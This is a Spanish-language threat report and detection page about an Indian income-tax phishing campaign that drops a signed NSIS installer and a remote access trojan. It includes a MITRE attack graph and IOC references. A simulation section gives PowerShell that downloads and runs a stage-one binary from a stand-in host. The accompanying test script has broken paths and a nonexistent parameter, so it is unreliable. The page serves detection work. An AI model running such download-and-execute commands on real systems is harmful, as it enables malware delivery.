Seguir
Detection stack
- AIDR
- Alert
- ETL
- Query
Resumen
Una operación de phishing que suplanta al Departamento de Impuestos sobre la Renta de la India entrega un PDF con trampa que canaliza a los destinatarios a un portal de cumplimiento falso. El sitio solicita a las víctimas que descarguen un paquete ZIP que contiene un instalador NSIS firmado, el cual despliega un troyano de acceso remoto de múltiples etapas. El RAT persiste creando un servicio de Windows y se comunica con múltiples servidores C2 a través de puertos no estándar.
Investigación
Los investigadores analizaron la trampa en PDF, la URL incrustada y el flujo de trabajo encadenado del instalador NSIS. Documentaron los binarios depositados en el disco, la creación de una carpeta de instalación oculta y el registro de NSecRTS.exe como un servicio de Windows. El informe también capturó las comunicaciones salientes a tres direcciones IP y destacó el uso de cargas útiles firmadas a lo largo de la cadena de entrega.
Mitigación
Bloquee el dominio malicioso y las direcciones IP relacionadas en el perímetro y a través de controles de proxy. Fortalezca las protecciones de correo electrónico para marcar archivos adjuntos y enlaces temáticos de impuestos que conducen a portales de cumplimiento falsos. Evite la ejecución automática de instaladores no confiables cuando sea posible y monitoree la creación de servicios sospechosos, especialmente cualquier cosa nombrada “Windows Real-time Protection Service.”
Respuesta
Alerta sobre los nombres de archivos listados, hashes y la actividad de registro de servicios de Windows vinculada a la cadena de infección. Aísle los puntos finales afectados, adquiera imágenes de memoria y disco, y realice un barrido forense completo para identificar cualquier etapa o herramienta adicional del RAT. Elimine los artefactos de persistencia y restablezca las credenciales potencialmente expuestas para prevenir un reingreso.
graph TB %% Definiciones de clases classDef action fill:#99ccff classDef tool fill:#cccccc classDef malware fill:#ffcc99 classDef file fill:#e6e6e6 %% Nodos – Acciones (Técnicas MITRE) action_phishing_attachment[«<b>Acción</b> – T1566.001: <b>Adjunto de Spearphishing</b><br/>Correo electrónico con PDF malicioso “Review Annexure.pdf” entregado a la víctima.»] class action_phishing_attachment action action_phishing_link[«<b>Acción</b> – T1566.002: <b>Enlace de Spearphishing</b><br/>El PDF contiene un enlace a un portal falso de impuestos (hxxps://www.akjys.top/).»] class action_phishing_link action action_user_execution[«<b>Acción</b> – T1204.002: <b>Ejecución por el Usuario</b><br/>La víctima hace clic en el enlace, el archivo ZIP se descarga automáticamente y se ejecuta el instalador.»] class action_user_execution action action_code_signing[«<b>Acción</b> – T1553.002: <b>Firma de Código</b><br/>Instaladores NSIS firmados con certificados de apariencia legítima.»] class action_code_signing action action_signed_binary_proxy[«<b>Acción</b> – T1218: <b>Ejecución mediante Binario Firmado</b><br/>El instalador NSIS firmado lanza la carga maliciosa, eludiendo controles.»] class action_signed_binary_proxy action action_obfuscation[«<b>Acción</b> – T1027.002: <b>Empaquetado de Software</b><br/>Envoltorios NSIS multietapa cifran y ocultan binarios maliciosos.»] class action_obfuscation action action_persistence_service_perm[«<b>Acción</b> – T1574.010: <b>Debilidad en Permisos de Archivos de Servicios</b><br/>El instalador modifica los permisos de archivos del servicio.»] class action_persistence_service_perm action action_persistence_service[«<b>Acción</b> – T1569.002: <b>Ejecución de Servicio</b><br/>Registra NSecRTS.exe como servicio de Windows “Windows Real-time Protection Service”.»] class action_persistence_service action action_discovery_system[«<b>Acción</b> – T1082: <b>Descubrimiento de Información del Sistema</b><br/>El RAT recopila versión del SO y detalles de hardware.»] class action_discovery_system action action_discovery_software[«<b>Acción</b> – T1518: <b>Descubrimiento de Software</b><br/>El RAT enumera aplicaciones y servicios instalados y almacena datos en C:\Program Files\Common Files\NSEC\Data.»] class action_discovery_software action action_c2_web[«<b>Acción</b> – T1071.001: <b>Protocolos Web</b><br/>Comunicación C2 mediante HTTP/HTTPS.»] class action_c2_web action action_c2_nonstandard[«<b>Acción</b> – T1571: <b>Puerto No Estándar</b><br/>Utiliza los puertos 48991, 48992 y 3898 para tráfico C2.»] class action_c2_nonstandard action action_c2_bidirectional[«<b>Acción</b> – T1102.002: <b>Servicio Web Bidireccional</b><br/>Permite comunicación bidireccional con el servidor.»] class action_c2_bidirectional action action_remote_access[«<b>Acción</b> – T1219: <b>Herramientas de Acceso Remoto</b><br/>El atacante ejecuta comandos, exfiltra datos y mantiene el control.»] class action_remote_access action action_exfiltration_scheduled[«<b>Acción</b> – T1029: <b>Transferencia Programada</b><br/>Los datos recolectados se envían periódicamente vía POST al servidor C2.»] class action_exfiltration_scheduled action action_defense_evasion[«<b>Acción</b> – T1070.004: <b>Eliminación de Archivos</b><br/>El cargador elimina archivos y carpetas temporales tras la ejecución.»] class action_defense_evasion action action_multi_stage[«<b>Acción</b> – T1104: <b>Canales Multietapa</b><br/>Instaladores sucesivos entregan la carga final del RAT.»] class action_multi_stage action %% Nodos – Herramientas / Archivos / Malware tool_nsis_installer[«<b>Herramienta</b> – <b>Nombre</b>: Instalador NSIS<br/><b>Descripción</b>: Instalador firmado utilizado para iniciar la carga.»] class tool_nsis_installer tool malware_rat[«<b>Malware</b> – <b>Nombre</b>: NSEC RAT<br/><b>Descripción</b>: Troyano de acceso remoto que proporciona control total del sistema.»] class malware_rat malware file_pdf[«<b>Archivo</b> – <b>Nombre</b>: Review Annexure.pdf<br/><b>Tipo</b>: Adjunto PDF malicioso.»] class file_pdf file file_zip[«<b>Archivo</b> – <b>Nombre</b>: Review Annexure.zip<br/><b>Tipo</b>: Archivo que contiene el instalador NSIS.»] class file_zip file file_exe[«<b>Archivo</b> – <b>Nombre</b>: NSecRTS.exe<br/><b>Tipo</b>: Ejecutable de servicio registrado en Windows.»] class file_exe file %% Conexiones – Flujo de Ataque action_phishing_attachment –>|contiene| file_pdf file_pdf –>|enlaza a| action_phishing_link action_phishing_link –>|conduce a| file_zip file_zip –>|ejecutado por| action_user_execution action_user_execution –>|usa| tool_nsis_installer tool_nsis_installer –>|firmado con| action_code_signing action_code_signing –>|habilita| action_signed_binary_proxy action_signed_binary_proxy –>|ofusca mediante| action_obfuscation action_obfuscation –>|crea| malware_rat malware_rat –>|instalado como| action_persistence_service_perm action_persistence_service_perm –>|habilita| action_persistence_service action_persistence_service –>|ejecuta| file_exe file_exe –>|recopila mediante| action_discovery_system file_exe –>|recopila mediante| action_discovery_software action_discovery_system –>|envía datos a| action_c2_web action_discovery_software –>|envía datos a| action_c2_web action_c2_web –>|usa puertos| action_c2_nonstandard action_c2_web –>|usa canal| action_c2_bidirectional action_c2_bidirectional –>|proporciona| action_remote_access action_remote_access –>|realiza| action_exfiltration_scheduled action_exfiltration_scheduled –>|desencadena| action_defense_evasion action_defense_evasion –>|precede a| action_multi_stage %% Estilos class tool_nsis_installer, file_pdf, file_zip, file_exe tool class malware_rat malware class action_* action
Flujo de ataque
Detecciones
Comando y Control Sospechoso por Solicitud DNS de Dominio de Nivel Superior (TLD) Inusual (a través de DNS)
Ver
IOCs (DestinationIP) para detectar: Campaña de Phishing Temática de Impuestos sobre la Renta India Dirigida a Negocios Locales
Ver
IOCs (SourceIP) para detectar: Campaña de Phishing Temática de Impuestos sobre la Renta India Dirigida a Negocios Locales
Ver
IOCs (HashMd5) para detectar: Campaña de Phishing Temática de Impuestos sobre la Renta India Dirigida a Negocios Locales
Ver
Detección de Ejecución de Malware en Campaña de Phishing Temática de Impuestos sobre la Renta India [Creación de Procesos de Windows]
Ver
Detección de Comunicación C2 de NSecRTS.exe [Conexión de Red de Windows]
Ver
Ejecución de Simulación
Requisito Previo: La Verificación Previa de Telemetría y Línea Base debe haber pasado.
Justificación: Esta sección detalla la ejecución precisa de la técnica del adversario (TTP) diseñada para activar la regla de detección. Los comandos y la narrativa DEBEN reflejar directamente los TTPs identificados y apuntar a generar la telemetría exacta esperada por la lógica de detección.
-
Narrativa del Ataque y Comandos:
Un adversario entrega un correo electrónico de phishing titulado “Aviso de Impuestos sobre la Renta”. El archivo adjunto es un documento Word malicioso que descargasetup_Ir5swQ3EpeuBpePEpew=.exeto%TEMP%. La víctima ejecuta el archivo, lo que a su vez generaSibuia.exe(la carga útil verdadera) como su hijo. Esta cadena hijo‑padre está diseñada para eludir alertas genéricas de creación de procesos pero es captada por la regla Sigma.Pasos realizados en el host comprometido:
- Sueltan el binario de primera etapa:
$stage1 = "$env:TEMPsetup_Ir5swQ3EpeuBpePEpew=.exe" Invoke-WebRequest -Uri "http://malicious.example.com/stage1" -OutFile $stage1 - Ejecute el binario de primera etapa:
Start-Process -FilePath $stage1 -NoNewWindow - El binario de primera etapa crea internamente el segundo binario de etapa
Sibuia.exeen el mismo directorio y lo lanza: (Simulado por el script de prueba a continuación.)
- Sueltan el binario de primera etapa:
-
Script de Prueba de Regresión:
El script a continuación reproduce la relación exacta padre‑hijo requerida para activar la regla.# ------------------------------------------------- # Simulación de cadena de phishing de Impuestos sobre la Renta de la India # ------------------------------------------------- # Definir rutas $stage1 = "$env:TEMPsetup_Ir5swQ3EpeuBpePEpew=.exe" $stage2 = "$env:TEMPSibuia.exe" # Crear binarios de prueba (de cero bytes – suficientes para registro de Sysmon) Set-Content -Path $stage1 -Value 'REM stage1 placeholder' -Encoding ASCII Set-Content -Path $stage2 -Value 'REM stage2 placeholder' -Encoding ASCII # Asegúrese de que los archivos sean ejecutables (Windows no necesita chmod) Write-Host "[*] Lanzando stage1..." $proc1 = Start-Process -FilePath $stage1 -PassThru # Dar a stage1 un momento para “generar” stage2 (simulado por lanzamiento directo) Start-Sleep -Milliseconds 500 Write-Host "[*] Stage1 generando stage2 (Sibuia.exe)..." $proc2 = Start-Process -FilePath $stage2 -PassThru -Parent $proc1.Id Write-Host "[+] Simulación completa. Verificar detección en SIEM." # ------------------------------------------------- -
Comandos de Limpieza:
Eliminar los artefactos y terminar cualquier proceso persistente.# Detener cualquier proceso remanente Get-Process -Name "setup_Ir5swQ3EpeuBpePEpew=" -ErrorAction SilentlyContinue | Stop-Process -Force Get-Process -Name "Sibuia" -ErrorAction SilentlyContinue | Stop-Process -Force # Eliminar archivos Remove-Item -Path "$env:TEMPsetup_Ir5swQ3EpeuBpePEpew=.exe" -Force -ErrorAction SilentlyContinue Remove-Item -Path "$env:TEMPSibuia.exe" -Force -ErrorAction SilentlyContinue Write-Host "[*] Limpieza completa."